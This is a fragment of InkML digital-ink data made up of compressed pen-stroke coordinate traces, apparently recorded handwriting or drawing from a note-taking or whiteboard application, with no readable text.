16,-70 0-16,-1 18 16,1-18-16,0 0 15,17 18-15,-18-18 16,1 17-16,53 1 16,17 0-16,35 17 15,-35-18-15,1-17 16,-1 0-1,0 0-15,53 0 0,-17 18 16,17-18 0,-18 0-16,-70 0 0,35 0 15,-17 0 1,-1 0-16,54 0 16,-36 0-16,36 0 15,52 0-15,-17 0 16,-36 0-16,36 0 15,35 0-15,0 0 16,-53 0-16,-17 0 16,-54 0-16,-17 0 15,-18 0-15,18 0 16,-35 0-16,0 0 16,17 0-16,0 0 15,0 35-15,1-17 16,34-18-16,18 0 15,36 0-15,-18 0 16,52 18-16,-34-18 16,35 17-16,17 19 15,-52-19-15,34 1 16,-52-18-16,35 0 16,-35 0-16,18 18 15,-19-18 1,-16 0-16,-1 0 15,35 0-15,1 35 16,-18-35-16,-1 0 16,19 17-16,-18-17 15,0 0-15,-1 0 16,-34 0-16,-1 0 16,-52 0-16,17 0 15,-17 0 63,35-17-78,-35 17 16,-1-18-16,1 18 31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4:16.1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70 11095 0,'0'-18'141,"123"18"-141,18 0 15,-70 0-15,-1 0 16,1-17-16,-18-1 15,-18 18-15,36 0 16,-18 0-16,-1 0 16,-16 0-16,-1 0 15,-17 0 1,-1 0 0,1 0-16,35 35 15,-18-35 1,36 0-16,-18 0 15,17 18-15,36-1 16,-36-17-16,36 0 16,18 18-16,-18-18 15,52 35-15,-52-35 16,35 0-16,18 0 16,-18 0-16,53 0 15,-88 0-15,-53 0 16,-35 0-16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53:14.8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27 5944 0,'35'0'62,"0"0"-46,18 0 0,-35 0-16,0 0 15,17 0-15,0 0 16,18 0-16,-18 0 16,18 36-1,0-36-15,-35 0 16,-1 0-1,1 0 1,17 0 31,-17 0-31,0 0-1,-1 0 141,1 0-140,0 0-16,17 0 16,18 17-16,35-17 15,-18 18-15,54-18 16,35 0-16,35 17 16,0 19-16,53-19 15,17-17 1,19 36-16,122-1 15,-193 0-15,52-35 16,-70 0-16,-105 0 16,-54 0-16,-17 0 47,123-17 203,70-36-250,1 17 15,17 1-15,-17 17 16,-71 18-16,18-35 15,-36 18-15,-70 17 16,-17 0-16,-19 0 94,18 0-79,36 0-15,35 0 16,53 0-16,-18 0 16,17 0-16,-16 0 15,-19 0-15,-17 0 16,-53 0-16,-18 0 16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6:41:24.1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93 4410 0,'0'0'0,"18"0"16,-1 0-16,18 0 15,1 0-15,52 0 16,-17 17-1,17 1-15,-35 0 16,405 17 15,-140-17-15,-160-18 0,37 17-16,157-17 15,-193 0 1,0 0-16,17 0 15,1 0-15,17 0 16,17 18-16,1-1 16,211-17-1,-246 18 1,228 17 0,-211-17-16,18-18 0,-18 35 15,-35-35-15,0 18 16,-1 0-1,-34 17-15,-18-35 16,17 0-16,18 0 16,-17 0-16,158 0 31,-141 0-31,0 0 0,0 0 16,18 0-16,194 0 31,17 0-16,-193 0-15,193 53 16,-176-18-16,564 53 47,71 36-16,-599-124-31,17 0 0,264 0 31,-264 0-31,159-53 16,-212 18-16,-53 17 16,494 0 31,-300 71-32,0-35 1,441-18 31,-335 0-32,-317 0 1,-1 0-16,-17 0 16,564-106 15,-528 53-16,-37 35-15,19-17 16,-36 0-16,0 0 16,-35-18-16,18 17 15,-54-17-15,1 18 16,0 18-16,-18-1 16,17-17-1,1-1 1,0 19-16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6:41:25.3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10 5556 0,'0'0'0,"18"0"31,0 0 0,17 0-15,124 0 0,317 0-1,-4110 0 1,8785 0 31,-4939 0-32,-177 0 1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6:41:26.4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87 7179 0,'18'18'47,"-1"-18"-47,36 0 16,-18 17-16,583-17 47,-477 0-32,35 0-15,1 0 16,17 0-16,-36 18 15,36 0 1,212 34-16,-194 1 16,17-35-16,36 17 15,440 1 1,-458-36 15,-194 0-31,-18 0 0,-17 0 16,0 0-16,17 0 62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6:41:30.4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93 7655 0,'0'0'0,"0"106"0,35 35 16,-17 36 0,0 52-16,17 71 0,0 1428 31,-35-1004-15,35 52-16,54-88 15,-1 0-15,18-71 16,-18-17-16,0-54 15,-35-140-15,-18-35 16,18-19-16,0-105 16,0-17-16,0-36 15,0-18-15,35 53 47,-53-158-31,1-36-1,-36 18-15,35 0 16,-18-18-16,89 212 31,-53-123-15,-35-107-16,-18 1 16,18 0-16,-18-1 15,17 1 48,-17-1-63,18 1 15,17 17-15,89-17 16,123 0 0,88 52 15,-106-52-31,900 141 31,-529-54-31,87-16 16,1836 281-1,1146-141 17,-1994-229-17,1112-17 16,-2134-71-31,1587-230 47,-1975 265-47,-36 35 16,71-34 0,70-142 15,-299 123-31,105-88 15,-140 124 1,69-18-16,1 18 16,18-1-16,863-334 62,-563 123-62,-195 88 16,0 36-16,107-71 15,52-88-15,617-565 32,-352 230-17,-495 440-15,-16-34 16,-54 52-16,-18 18 16,-34 17-16,-1-70 31,-35 124-31,0-1 0,-18-35 15,1 0-15,-1 18 16,-35-88 0,18 70-16,-18 18 15,-18 0 1,1-1-16,-19-34 16,1-1-16,-35-17 15,17 0-15,18 35 16,-53-35-16,35-17 15,-35 34-15,-265-317 32,265 282-17,-35 18-15,-195-70 16,195 122-16,-459-281 47,388 282-47,-141 17 31,-53 54 0,317-19-31,-193-17 16,140 0-16,-34-17 16,-1077-336 30,706 247-30,53 71 0,-547-141 15,529 123-15,441 106-1,36-17-15,-1 17 16,-35-36-16,36 36 15,-142-17 1,-105-72 0,140 72-16,1-1 15,-1 0-15,54 18 16,-36 0-16,18-17 16,-35-1-16,35 1 15,-18-19-15,18 19 16,-89-19-16,19-34 15,-248-36 1,18 0 0,247 88-16,0-34 15,35 16-15,-17 1 16,-18-53-16,-318-18 31,107 0-15,193 71-1,-17 0-15,-36 17 16,53-35-16,-17 18 16,53 17-16,17 18 15,36-17-15,-213 17 32,266 0-32,35 0 15,-18-18 16,-18 18-31,1 0 32,-54 0-1,36 0-15,53-18-16,-142-52 15,54 17-15,-565-141 63,476 176-48,0-17 1,-281-53 15,-72-36-15,301 89-1,158 17 1,-71 18 15,124 0-15,18 0 0,-4110-17-16,7902-1 46,-3792 18-30,17 0-16,-17 0 0,17 18 31,1-18-31,-19 17 16,-69-17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1:51.8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43 8925 0,'-17'0'63,"-1"0"-63,-17 0 15,0 0 1,17 0 0,-17 0-16,17 0 15,0 0 1,1 0-16,-36 0 16,35 0-1,-17 0-15,17 0 16,-17 0-1,17 18 17,18 0-17,-17-18-15,-1 0 16,1 0-16,-1 0 31,0 0-15,18 17 31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2:41:54.2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07 13141 0,'-18'0'157,"1"0"-142,-36 18 1,35-18 15,0 0 0,1 0-15,-1 0 0,0 17-1,1-17-15,-1 0 31,1 0-15,-1 0 0,0 0 31,1 0-16,-1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7:54.2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62 11230,'18'0,"-18"-18,37 0,-19 18,0 0,18 0,19-18,-19 18,37 0,17 0,37 0,18 0,1 0,53 0,-17 0,-1 0,55 0,-18 0,17 0,-53 18,17-18,-17 0,-19 18,37-18,-37 18,18-18,-17 19,-1-19,18 18,-35-18,-56 18,74 0,-92-18,19 0,-37 18,-17-18,17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7:03.0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513 14482 0,'0'-36'94,"17"36"-79,19 0-15,-1 0 16,-17 0 0,-1 0-16,1 0 15,0-17-15,-1 17 16,1 0-16,-1 0 15,1-18-15,0 18 16,-1 0 0,1 0-1,0 0 17,-1-18-32,1 18 46,0 0-3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7:05.8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48 15575 0,'-18'0'31,"1"0"-15,-1 0 62,0 0-62,-17 0-16,17 0 15,-17 18-15,-18-18 16,18 17-16,0 1 16,-1 0-16,19-18 15,-1 0 17,1 0 30,-1 0-46,0 0 15,1 0 16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7:10.3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14 10213 0,'0'-18'31,"36"1"-15,17 17-16,-36 0 16,36 0-16,-18 0 15,1 0-15,-1-18 16,0 0-16,1 18 15,-19 0 1,1 0 0,0 0-1,-1 0 1,1-17 0,-1 17-1,1 0-15,17 0 16,-17 0-16,0 0 15,-1 0-15,1 0 16,35 0 62,-36 0-78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7:11.0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91 11553 0,'0'0'0,"18"0"0,-1 0 16,19 0-1,-19 0 1,1-17-1,17 17 1,0 0-16,1 0 16,69 0-16,-16 0 15,-1 0-15,0 17 16,18 1-16,-53 17 16,35 1-16,-53-36 15,-17 0-15,17 0 16,-17 0-1,-1 0 32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55.8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68 1434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9:17.5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44 5662 0,'-17'18'16,"34"-18"140,1 0-156,17 0 16,-17 0-1,35 0-15,17 0 16,19 53-16,-19-53 16,-17 0-16,0 0 15,-18 0-15,-17 0 16,17 17-16,0-17 16,-17 0-1,17 0 1,18 0-16,18 36 15,-18-36-15,17 17 16,1 1-16,17-18 16,-17 35-16,-54-17 15,18-18-15,1 0 16,-19 0 15,1 0 0,0 0 1,-1 0-17,19 0-15,34 0 16,18 0 0,-35 0-16,-35 0 15,17 0-15,0 17 16,-17-17 15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9:18.8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38 9825 0,'18'0'78,"17"0"-63,36 0-15,17 0 16,18 0-16,-36 0 16,54-35-16,17-1 15,124 36-15,-71-17 16,17 17-16,1 0 16,-53 0-16,17 0 15,-123 0-15,-18 0 16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29:28.6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09 7391 0,'53'0'125,"0"0"-125,-36 0 16,36 0-1,71 0-15,-1 0 16,36 0-16,35 0 16,18 0-16,-36 0 15,18 0-15,-53 0 16,-53 0-16,-17 0 16,-18 17-16,-35-17 31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0:35.9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15 11324 0,'0'-17'203,"35"17"-172,-17 0 0,35 0-31,-18 0 16,18 0-16,0 0 16,0 0-16,0 0 15,17 0-15,-35 0 16,18 0-16,-17 0 15,-19 0-15,18 0 16,-17 0-16,0 0 16,17 0-16,-17 0 15,17 0-15,0 0 16,0 0-16,18 0 16,-35 0-16,53 0 15,-1 0-15,1 0 16,35 35-16,35-35 15,-36 17-15,-52-17 16,-35 18 0,0-18-16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0:54.8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09 12171 0,'-18'-18'31,"36"1"1,0 17-17,17 0 1,-35-18 0,18 18 15,17-18-31,18 1 15,-36 17 1,-17-18 0,53 18-1,-35 0 1,17 0-16,-17 0 16,17 0-16,18 0 15,0 0-15,53 0 16,-36 0-16,19 0 15,16 18-15,-16-18 16,-19 17-16,1-17 16,-18 18-16,0-18 15,-18 0-15,18 0 16,-18 0-16,-17 0 16,35 0-16,-18 0 15,18 0-15,0 0 16,0 0-16,0 0 15,-1 0-15,1 0 16,-17 0-16,-19 0 16,19 0-16,-19 0 15,1 0 235,-1 0-218,1 0-1,35 0 16,-35 0-32,-1 0 32,1 0-31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8:18.5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11 10287,'0'-18,"18"18,0 0,0 0,0 0,19 0,-1 0,0 0,1 0,17 0,0 0,1 0,17 0,37-18,18 18,18 0,1 0,17 0,-18 0,55 0,17 0,1 0,36 0,-36 0,72 0,-18 0,-36 0,0 0,-18 0,-19 0,-36 0,1 0,35 0,-54 0,19 0,-19 0,0 0,-18 0,18 0,-36 18,18-18,18 0,-36 0,36 0,-18 0,0 0,0 0,-18 0,18 0,-18 0,0 0,18 0,0 0,-18 0,-1 0,-17 0,36 0,-54 0,36 0,-19 0,1 0,0 0,-1 0,1 0,18-18,18 18,-36 0,18 0,-19 0,19-18,-18 18,-19 0,37 0,-18 0,0 0,-1 0,19 0,18 0,-36 0,36 0,-18 0,0 0,0 0,-19 0,-17 0,-1 0,19 0,-55 0,19 0,-1 0,-17 0,-1-19,-18 19,18 0,1 0,-1 0,0 0,-18 0,0 0,19 0,-19 0,0 0,0 0,0 0,37 0,-37 0,0 0,18 0,1 0,-1 0,0 0,0 0,-17 0,17 0,-18 0,0 0,0 0,0 0,1 0,-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09.5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62 15558 0,'17'0'172,"1"0"-156,35 0-1,53 0-15,-18 0 16,18-18-16,0 18 15,0-18-15,-18 18 16,88 0-16,-17 0 16,-36 0-16,18-17 15,-17-1-15,-18-35 16,-71 53-16,0 0 16,-17 0 30,17 0-30,1 0 0,-1 0-16,0 0 15,0 0-15,-17 0 16,17 0-16,1 0 16,-19 0-16,1 0 31,17 0 16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21.7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91 16863 0,'35'0'125,"-17"0"-125,53 0 16,17 0-16,-18 0 15,54 0-15,17 0 16,-35 0-16,-18 0 16,-17 0-16,-1 0 15,-17 0-15,-18 0 16,1 0-16,-1 0 15,-18 0 1,19 0 0,-19 0-16,36 0 15,0 0-15,18 0 16,-36 0-16,18 0 16,-18 0-16,1 0 15,-19 0-15,1 0 16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22.7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27 17674 0,'17'0'62,"18"0"-46,54 0-16,52 18 16,-18-18-16,36 0 15,35 0-15,-35 53 16,35-53-16,-141 0 16,88 17-16,0 1 15,-35-18-15,-71 35 16,0-35-16,-17 18 15,0-18 126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25.6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97 5750 0,'18'0'78,"35"0"-78,17 0 32,54-53-32,17 36 15,-88 17-15,17 0 16,-17 0-16,0 0 16,35 0-16,-17 0 15,-18 0-15,-18 0 16,18 0-16,17 0 15,-17 0-15,-17 0 16,16 0-16,-16 0 16,-19 0-16,1 0 15,0 0-15,-18-18 32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26.7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15 4798 0,'35'0'62,"0"0"-46,18 0-16,0 0 16,0 0-16,35-18 15,53 18-15,-17 0 16,-36 0-16,-17 0 15,-1 0-15,36 0 16,17 18-16,-87-18 16,52 17-16,-35-17 15,17 18-15,1-18 16,35 18-16,-18-18 16,0 35-16,-17-35 15,-36 0-15,36 0 16,-19 0-16,1 0 15,-35 0-15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28.4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79 6650 0,'18'0'31,"0"-18"-16,-1 18-15,19 0 16,-19 0-16,19 0 16,16 0-1,37-35-15,17 35 16,52-18-16,1 18 16,35 0-16,0 0 15,18-17-15,17 17 16,0 0-16,-17 0 15,-71 0-15,-17 0 16,-89 17-16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1:53.4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63 7338 0,'18'0'156,"-1"0"-140,1 0-16,0 0 15,17 0-15,35 0 16,1 0-16,0 0 15,34 0-15,-34 0 16,-18 0-16,17 0 16,-52 0-16,35 0 15,0 0-15,-35 0 16,34 0-16,1 0 16,0 0-16,18 0 15,17 0-15,0 0 16,-17 0-16,17 0 15,-53 0 1,18 0-16,-18 0 16,-17 0-1,0 0 32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75 9860 0,'18'0'63,"0"0"-63,-1 0 16,18 0-16,36 0 15,0 0-15,34 0 16,1 0-16,0 0 15,-18 0-15,36 0 16,-1 0-16,36 0 16,0 18-16,17 17 15,1 0-15,-19-17 16,1-18-16,35 18 16,0-18-16,18 0 15,-36 0-15,1 35 16,-19-17-16,-17-1 15,-17 1-15,-1-1 16,-17 1-16,-18 0 16,1-1-16,-37-17 15,-16 18-15,-19-18 16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36.6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79 10037 0,'0'-18'16,"17"18"15,1 0-15,17-18-1,0 18-15,1 0 0,17-17 16,52 17-16,-34-18 16,17 18-16,36 0 15,-36 0-15,141 0 16,-158 0-1,17 0 1,-17 0-16,-1 0 16,36 0-16,-53 0 15,17 0-15,-34 18 0,-1-18 16,-17 0-16,-1 17 172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37.4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07 10178 0,'35'0'47,"18"0"-47,18 0 16,17 0-16,0 0 15,53 0-15,0 0 16,-17 0-16,-1 0 15,-35 0-15,-35 0 16,0 0-16,-17 0 16,-1 0-16,-18 0 1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19:58.7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37 4300,'18'0,"1"-18,-1 18,0 0,18 0,0 0,37 0,0 0,17 0,19 0,36 0,19 0,35 0,-36 0,37 0,-37 0,37 0,-73 0,-18 0,18 0,-37 0,19 0,-54 0,17 0,-35 0,17 0,19 0,-1 0,-17 0,-1 0,-18 0,1 0,-1 0,18 0,1 0,-19 0,-18 0,0 0,19 0,17 0,0 0,19 0,0 0,17 0,-17 18,18-18,-1 0,-17 0,-19 0,19 0,-37 0,0 0,-17 0,-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38.6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228 10283 0,'35'-17'47,"53"-1"-32,-17 18-15,35-17 16,17-1-16,1 0 16,-1 1-16,-35-1 15,18 0-15,-35 1 16,-1 17-16,-35 0 16,36-18-16,-53 18 15,17 0-15,-17-18 16,17 18-16,0 0 15,-17 0-15,17-17 16,0 17-16,18 0 16,0 0-16,-18 0 15,18 0-15,-17 0 16,-1 0-16,-17 0 16,-1 0-1,1 0 32,-1 0-31,1 0 202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40.8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262 10248 0,'17'-17'46,"19"17"-30,-1 0-16,0 0 16,36 0-16,17 0 15,0 0 1,18 0-16,17 0 0,36 0 16,-35 0-16,34 0 15,-17 0 1,-17 0-16,-1 0 15,-52 0-15,0 0 16,-19 0-16,1 0 16,-35 0-16,0 0 15,-1 0 1,1 0 46,0 0-62,17 0 16,0 0-16,18 0 16,35 0-16,18 0 15,35 0-15,-35 0 16,53 0-16,-18 0 16,18 0-16,35-36 15,-53 36-15,17 0 16,-16-17-16,-19 17 15,-35 0-15,-35 0 16,0 0-16,-18 0 16,-17 0-1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41.9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51 11412 0,'0'0'0,"18"0"31,-1 0-31,19 0 0,17 0 16,-18 0-16,0 0 16,159 0-1,-88 0-15,17 0 16,19 0-1,-1 0-15,-53 0 16,35 0-16,-52 0 16,-1 0-16,-17 0 0,-35-17 109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52.4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84 12982 0,'0'-17'93,"0"-1"-61,35 18-32,36 0 15,-1-18-15,18 1 16,1 17-16,16 0 15,-34 0-15,0 0 16,-18 0-16,17 0 16,-17 0-16,18 0 15,17 0-15,-18 0 16,36 0-16,-18 0 16,18 0-16,-18 0 15,-17 0-15,-1 0 16,107 0 15,-124 0-31,-18 0 0,18 0 16,0 0-16,17 0 15,-17 0-15,18 0 16,-1 0-16,-34 0 16,17 0-16,0 0 15,-18 0-15,0 0 16,0 0-16,71 0 31,-53 0-31,18 0 0,-1 0 16,18 0-1,1 0-15,-36 0 16,35 0-16,-35 0 16,17 0-16,-17 0 15,-18 0-15,1 0 16,-1 0-16,18 0 15,17 0-15,1 17 16,35 1-16,0 0 16,0-1-16,-1 1 15,-34-18-15,-36 18 16,-17-18-16,17 0 16,-17 0-1,-1 0 1,1 0-1,0 17 1,17-17-16,-17 0 16,-1 0-16,18 0 15,-17 18-15,35-18 16,-35 0-16,35 0 16,-18 0-16,0 0 15,18 0-15,0 0 16,35 0-16,-17 0 15,-1 17 1,1-17-16,-18 0 16,0 0-16,-36 0 15,19 0-15,-19 0 16,1 0 0,0 18-16,-1-18 15,1 0-15,-1 0 16,1 0-16,0 0 15,-1 0 64,1 0-17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54.1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214 13000 0,'0'0'0,"18"0"16,-1 18-16,36-1 15,-17-17-15,17 0 16,35 0-16,53 0 16,18 0-16,35 0 15,17 0-15,1 0 16,35 0-16,18 0 15,246 0 1,-282 0-16,-35 0 16,-17 0-16,-36 0 15,-35 0 1,-18 0-16,-35 0 0,0 0 16,-36 0-16,1 0 15,17 0 16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55.8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68 1434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0:56.8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51 14358 0,'17'18'31,"36"-18"-15,0 17-16,18-17 15,34 0-15,1 0 16,35 0-16,36 0 15,-18 0-15,-18 0 16,0 0-16,-18 0 16,-35 0-16,36 0 15,-36 0-15,-35 0 16,18 0-16,17 0 16,-53 0-16,18 0 15,0 0 1,0 0-16,0 0 15,17 0-15,-17 0 16,0 0-16,0 0 16,-18 0-16,-17 0 15,0 0-15,-1 0 63,18 0-48,-35 18 1,18 0 0,0-18-1,-1 17 1,1-17 109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2:01.6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34 12894 0,'18'0'109,"17"0"-109,-17 0 16,-1 0-16,36 0 15,-35 0-15,17 0 16,-17 0-16,17 0 15,18 0-15,0 0 16,18 0-16,-19 0 16,1 0-16,36 0 15,-37 0 1,19 0-16,-18 0 0,0 0 16,-18 0-16,0 0 15,-17 0 1,0 0-16,-1 0 15,1 0 17,0 0-17,-1 0 1,18 0 0,-17 0-1,17 0 1,-17 0 15,0 0 0,-1 0-15,1 0 0,0 0-16,35 0 15,-1 0-15,1 0 16,0 0-16,53 0 31,-71 0-31,-17 0 16,-18 18-1,18-18-15,-1 0 16,1 17-16,0-17 31,-18 18 47,35-18-46,-35 18 30,0-1-31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6:59.7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64 12700 0,'18'0'62,"53"0"-46,34 106-16,-34-71 15,-36 0-15,1 1 16,-1-1-16,-18 0 16,19 1-16,-1-19 15,-17 18-15,-1-52 110,-17-1-110,53-35 15,-53 18 1,0-18-16,0 18 15,0-1-15,18-16 16,-18 16-16,0-17 16,0 0-16,35 18 15,0-18-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1037.6227">1182 10054 0,'17'0'47,"19"0"-32,17 0-15,88 0 16,-35 106-16,-89-106 15,1 18-15,0-1 32,17-17-17,-18 0 1,36 18-16,-35-18 16,0 18-1,-1-18 48,1 0-63,35 0 15,0-18-15,0-53 16,17 1-16,-70 52 16,35-70-1,-35 53-15,0-36 16,18 36-16,0-36 15,-18 36 1,0 17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2:34.8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52 4374 0,'0'0'0,"18"0"16,17 0-1,-18 0-15,1 0 16,17 0-16,1 0 16,17 0-16,17 0 15,1 0-15,52-17 16,36-1-16,53 18 16,-1 0-16,-52 0 15,-36 0-15,-34 0 16,-72 0-16,1 0 15,0 0 1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0:07.2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76 4318,'18'0,"0"0,0 0,1 0,35 0,-36 0,0 0,19 0,35 0,-17 0,17 0,37 0,0 0,0 0,18 0,-37 0,37 0,19 18,-19-18,36 18,-72-18,54 0,36 0,-36 0,-18 0,-18 0,18 0,0 0,-36 0,18 0,-37 0,1 0,-19 0,1 0,-19 0,18 0,-17 0,35 0,-17 0,54 0,-19 0,19 18,-36-18,54 0,-37 0,-17 0,36 0,-18 0,-19 0,19 0,-37 0,-17 0,-1 0,18 0,-17 0,-1 0,0 0,-18 0,19 0,-1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2:38.3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20 4286 0,'18'0'94,"17"0"-94,18 0 15,0 0-15,17 0 16,1 0 0,17 0-16,35 0 15,-34 0-15,34 0 16,-35 0-16,18 0 15,-18 0-15,-17 0 16,176 0 0,-141 0-1,-36 0-15,18 0 16,-17 0-16,35 0 16,-53 0-16,0 0 15,-18 0-15,-18 0 16,1 0-16,0 0 62,-1 0 16,54 18-78,-18-18 16,17 0-16,19 18 16,16-18-16,19 17 15,-36 1-15,18-18 16,17 17-16,-34-17 16,34 0-16,18 0 15,0 0-15,0 0 16,18 0-16,0 0 15,17 0 1,1 0-16,17 0 16,0 0-16,17 0 15,-52 0-15,35-17 16,-35 17-16,0 0 16,-18 0-16,0 0 15,-35 0-15,-18 0 16,-35 0-16,35-18 31,-53 18-31,-17 0 0,0 0 16,17 0-16,0 0 15,18 0-15,18 0 16,17 0-16,18 0 16,17 18-16,1 17 15,-1 0-15,36 18 16,-36-53-16,212 53 31,-229-53-31,0 0 0,-35 0 16,35 0-1,-71 0-15,18 0 0,-36 0 16,19 0 0,17 0-16,-18 0 15,0 0-15,18 0 16,-18 0-16,1 0 15,16 0-15,-16 0 16,17 0-16,-18 0 16,18 0-16,0 0 15,-18 0-15,-17 0 16,-1 0-16,19 18 16,-19-18-16,19 17 15,-19-17-15,18 0 16,1 18-16,-19-18 15,1 0-15,35 0 16,-35 18-16,-1-18 16,1 17-16,0-17 31,-1 0-15,1 0-16,-1 0 15,19 0 1,-19 18 15,1-18-15,0 0 15,-18 18-15,17-18-16,19 0 15,-1 0 1,18 0-16,-18 0 15,-17 0-15,-1 0 16,1 0-16,17 0 16,-17 0-16,-1 0 15,19 0-15,-19 0 16,1 0-16,17 0 16,1 0-1,-19 0-15,18 0 16,-17 0-1,0 0 1,-1 0-16,1 0 31,0 0-31,-1 0 32,1 0-32,0 0 46,-1 0-46,1 0 11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03.9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17 7108 0,'17'0'109,"54"0"-109,-1 0 16,-17 0-16,18 0 15,-1 0-15,1 0 16,52 0-16,-17 0 16,18 0-16,-1 0 15,-35 0-15,18 0 16,-53 0 0,-18 0-16,1 0 0,-19 18 15,1-18 1,17 0 78,-17 0-48,-1 18-30,19-18 0,-1 17-16,18-17 15,0 0-15,53 18 16,0 0-16,17-1 16,0 1-16,-17 0 15,-35-1-15,-36-17 16,0 0-16,-17 0 15,0 18 64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09.2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95 7320 0,'18'0'16,"0"0"15,-1 0 0,1 0-31,-1 0 16,1 0-16,17 18 16,18-18-16,36 17 15,16-17-15,-16 0 16,34 0-16,89 0 15,17 0 17,-211 0-17,-1 0-15,19 0 16,-1 0-16,-18 0 16,19 0-16,17 0 15,17 0-15,1 0 16,-18 0-1,17 0-15,1 0 0,-36 0 16,18 0-16,35 0 31,-53 0-31,-17 0 16,-18 18-16,0 0 141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26.2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12559 0,'18'0'31,"17"0"-15,0 0-16,1 0 15,16 0-15,1 0 16,0 0-16,36 0 16,16 0-16,72 0 15,-1 0-15,36 0 16,17 0-16,-53 0 15,-34 0-15,-54 0 16,-53 0-16,0 0 16,-17 0 15,0 0-31,-1 0 16,1-18 109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56.1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72 12400 0,'71'0'63,"35"0"-48,17 0 1,-35 0-16,36 0 16,35 0-16,-18 0 15,53 0-15,-35 0 16,-1 0-16,19 0 15,-36 0-15,0 0 16,-53 0-16,18 0 16,0 0-16,-18 0 15,0 18-15,-53-1 16,-17-17-16,0 0 16,-18 18 46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57.5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199 12559 0,'53'0'63,"0"0"-47,-18 0-16,36 0 15,17 0-15,-17 0 16,17 0-16,-35 0 15,0 0-15,0-18 16,-36 18-16,36 0 16,-35 0-16,-1 0 15,1 0-15,0 0 16,-1 0-16,1 0 16,17 0-16,-17 0 15,0 0-15,17 0 16,-17 0-1,-1-35 79,1 35-78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58.5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315 12524 0,'17'0'0,"1"17"15,0-17 1,-1 0-1,18 18-15,1-18 16,-1 0-16,0 0 16,1 0-16,-1 0 15,18 0-15,-18 0 16,18 0-16,-18 18 16,-17-18-16,-1 0 15,19 0 1,-19 0-1,1 17 79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02.0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733 13794 0,'0'0'0,"1552"0"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04.0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97 13917 0,'0'-18'32,"35"1"-17,0 17 1,1-18-16,34 18 16,1 0-16,-1 0 15,-4074 0-15,8273 0 16,-3828 0 31,-406 0-47,0 0 15,-17 0-15,0 0 16,-1 0 0,1 0-16,0 0 109,-1 0-78,1 0-15,0 0-1,-1 0-15,18 0 32,1 0-32,-4076 0 15,8133 0-15,-4076 0 16,1 0-16,0 0 16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07.2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183 13882 0,'35'0'31,"1"0"-16,17-18-15,52 18 16,-16-17-16,34-1 16,18 18-16,0 0 15,18 0-15,17 0 16,-70 0-16,53 0 16,-71 0-16,0 0 15,-35 0-15,18 0 16,-18 0-16,0 0 15,0 0-15,0 0 16,35 0-16,18 0 16,17 0-16,-17 0 15,88 0-15,-35 0 16,17 0-16,-70 0 16,0 0-16,-36 0 15,-17-18-15,-18 18 16,-17 0 15,17-17-15,-17-1-16,0 18 15,17 0 1,18-18-16,17 1 16,-17-1-16,18 18 15,-18 0-15,0 0 16,0 0-16,-1 0 15,19 0-15,0 0 16,-1 0-16,1 0 16,17 0-16,-53 0 15,0 0-15,1 0 16,-1 0-16,-17 0 16,17 0-16,-17 0 15,35 0 1,-36 0-16,18 0 15,-17 0-15,17 0 16,-17 0 0,17 0-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0:09.8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55 4227,'37'0,"17"0,19 0,36 0,-19 0,37 18,0-18,-18 0,36 0,-36 19,36-19,0 0,-18 36,0-36,-36 0,36 0,-36 18,18 0,18-18,0 0,-37 0,1 0,18 0,-36 0,-1 0,1 0,-19 0,1 0,-1 0,-18 0,1 0,17 0,-36 0,0 0,0 0,1 0,-1 0,0 0,0 0,18 0,-18 0,1 0,-1 0,18 0,-18 0,0 0,19 0,-19 0,0 0,0 0,18 0,-18 0,19 0,-19 0,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36.2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81 16404 0,'18'0'63,"-1"0"-48,19 0 1,-1 0-16,0 0 15,1 0-15,-19 0 16,18 0-16,1 0 16,-1 0-16,18 0 15,0 0-15,0 0 16,17 0-16,1 0 16,-18 0-16,17 0 15,-34 0-15,34 0 16,1 0-16,17 0 15,-18 0-15,1 0 16,35 0-16,17 0 16,-34 0-16,34 0 15,-35 0-15,18 0 16,-35 0-16,-1 0 16,-17 0-16,-35 0 15,-1 0 1,1 0 31,17 0-32,-17 0 1,17 0-16,0 0 16,1 0-16,-1 0 15,-17 0-15,17 0 16,0 18-16,-17-18 15,17 0-15,-17 0 16,-1 0-16,19 0 16,-1 0-16,18 17 15,0 1-15,0 0 16,-18-18-16,0 17 16,18-17-16,-18 18 15,1 0-15,122 17 31,-87-17-31,17 17 0,-35-35 16,-35 0-16,-1 0 16,1 0-1,0 0 17,-1 0 14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58.7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06 16545 0,'18'0'46,"0"0"-30,17 0-16,-18 0 16,1 0-16,17 0 15,1 0-15,52-17 16,-18-1-16,-17 0 16,35-17-16,-52 35 15,-1 0-15,-17 0 16,-1 0-1,19 0-15,-36-18 0,17 18 47,1 0-31,0 0-16,17 0 16,0 0-16,0 0 15,54 0-15,16 18 16,19 17-16,70-17 31,-106 0-31,-35-1 0,0-17 16,0 0-16,-36 0 15,1 0 79,0-17-94,-18-1 16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4:59.5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17 16739 0,'0'-17'16,"0"-1"0,17 0-16,18 18 15,36-17 1,0 17-16,17 0 0,35 0 15,1 0-15,17 0 16,0 0 0,35 0-16,36 0 0,35 0 15,-35 0-15,-18 0 16,-36 0-16,-87 0 16,-71-18 46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5:11.2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168 16545 0,'0'0'0,"35"18"16,18-18-1,18 0-15,-1 0 0,1 0 16,52 0-16,-34 0 16,34 0-16,18 0 15,0 0-15,18 0 16,-18 0-16,124 0 31,-36 0-15,-88 0-16,-17 0 15,17 0-15,0 0 16,18 0-16,-18 0 16,211 0-1,-158 0-15,18 0 16,-53 0-16,35 0 15,-71 0-15,-34 0 16,-36 0-16,-18 0 16,-18 0-16,19 0 15,-19 0 1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5:12.3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8 17674 0,'17'0'16,"1"0"15,0 0-16,-1 18-15,1-18 16,17 0-16,18 17 16,-18-17-16,18 18 15,0-18-15,0 0 16,0 0-16,71 0 31,-54 0-31,-35 0 0,-17 0 16,17 0-16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5:14.0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798 17851 0,'35'0'31,"36"0"-16,52 0-15,18 0 16,18 0-16,17 0 16,-17 0-16,-18 0 15,0 0-15,-35 0 16,-18 0-16,1 0 16,-1 0-16,0 0 15,-18 0-15,36 0 16,-17 0-16,52 0 15,0 0-15,53 0 16,-18 0-16,18 0 16,-53 0-16,0 0 15,-52 0-15,16 0 16,-34 0-16,-18 0 16,-18 0-16,0 0 15,-17 0-15,17 0 16,-17 0 15,0 0-15,-1 0-16,19 0 15,34 0 1,18 17-16,-17-17 16,-1 18-16,19-18 0,-19 0 15,-35 17 1,-17-17-16,0 18 15,-1-18 1,1 0 0,0 18-16,52-1 15,-35-17-15,18 0 16,-17 0-16,-19 0 16,1 0-16,0 0 46,-1 18-30,1-18 